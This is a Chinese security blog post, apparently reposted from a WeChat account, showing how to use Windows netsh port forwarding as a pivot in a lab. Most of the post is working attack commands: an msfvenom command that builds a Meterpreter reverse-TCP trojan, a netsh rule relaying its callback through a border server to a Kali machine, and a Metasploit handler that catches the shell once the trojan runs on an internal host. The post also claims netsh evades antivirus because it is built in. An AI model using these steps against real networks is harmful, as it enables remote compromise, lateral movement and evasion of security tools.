netsh端口映射

admin 2022年5月24日09:40:45评论65 views字数 1374阅读4分34秒阅读模式

netsh端口映射

netsh是Windows系统自带的一个命令行工具,内置端口转发功能

因为是自带,所以不会被杀毒软件查杀

netsh操作流程

命令使用

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

listenaddress - 等待连接的本地IP地址。

listenport - 本地侦听TCP端口。

connectaddress - 将传入连接重定向到本地或远程IP地址(或DNS名称)。

connectport - 一个TCP端口,来自listenport的连接会被转发到该端口。


环境搭建

netsh端口映射

边界服务器:10.10.10.12

netsh端口映射

内网:10.10.10.11

netsh端口映射

攻击机kali:192.168.44.128

实际操作

MSF生成木马放入内网机器

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.12 lport=5555 -f exe -o tcp.exe

//此处生成的木马,回连地址是边界服务器的IP地址


netsh端口映射

边界服务器上

netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.44.128 connectport=6666

//边界服务器监听自己的5555端口,并转发到kali机器上的6666端口上,此时我们只需要在kali上监听本机的6666端口,就可以实现访问10.10.10.11

netsh interface portproxy show all //查看代理情况

netsh端口映射

MSF监听

use /exploit/mulit/hander

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.44.128

set lport 6666

exploit -j -z

netsh端口映射

在内网机器上(10.10.10.11)运行木马

netsh端口映射

成功上线

netsh端口映射

进入shell看下是否真的是10.10.10.11

netsh端口映射

补充说明

清除指定规则

netsh interface portproxy delete v4tov4 listenport=6666

清除所有规则

netsh interface portproxy reset


netsh端口转发监听meterpreter

模拟环境

netsh端口映射

在服务器B上通过设置代理访问C服务器,拿到C服务器的权限

实际操作

MSF生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.12 lport=5555 -f exe -o rev-tcp.exe


netsh端口映射

边界服务器

netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.44.128 connectport=6666


netsh端口映射

MSF开启监听

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.44.128
set lport 6666
exploit -j -z


netsh端口映射

内网机器运行木马上线

netsh端口映射

netsh端口映射


原文始发于微信公众号(Nurburgring):netsh端口映射

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日09:40:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   netsh端口映射https://cn-sec.com/archives/872697.html

发表评论

匿名网友 填写信息